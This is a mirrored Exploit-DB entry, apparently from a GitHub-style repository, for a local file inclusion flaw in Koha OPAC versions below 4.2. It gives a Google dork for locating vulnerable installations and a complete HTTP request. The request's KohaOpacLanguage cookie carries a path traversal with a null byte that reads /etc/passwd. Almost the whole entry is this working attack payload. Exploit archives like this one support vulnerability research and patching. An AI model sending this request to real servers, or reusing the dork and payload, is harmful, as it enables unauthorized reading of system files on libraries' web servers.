bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/cgi/webapps/18153.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

23 lines
No EOL
633 B
Text
Raw Blame History

# Exploit Title: [Koha Opac Local File Inclusion]
# Google Dork: [inurl:koha/opac-main.pl]
# Date: [17.11.2011]
# Author: [Akin Tosunlar(Vigasis Labs)]
# Software Link: [www.koha.org]
# Version: [<4.2]
# Tested on: [Linux(Apache 2.2.14)]
# CVE : []
# Vigasis Pentest Team (www.vigasis.com)
# 0-Day Exploit
# Akin Tosunlar
# Special Thanks to Ozgur Yurdusev
#Exploit
GET /cgi-bin/koha/opac-main.pl HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Cookie: sessionID=1;KohaOpacLanguage=../../../../../../../../etc/passwd%00
Connection: Close
Pragma: no-cache
Host: localhost
Reference in a new issue View git blame Copy permalink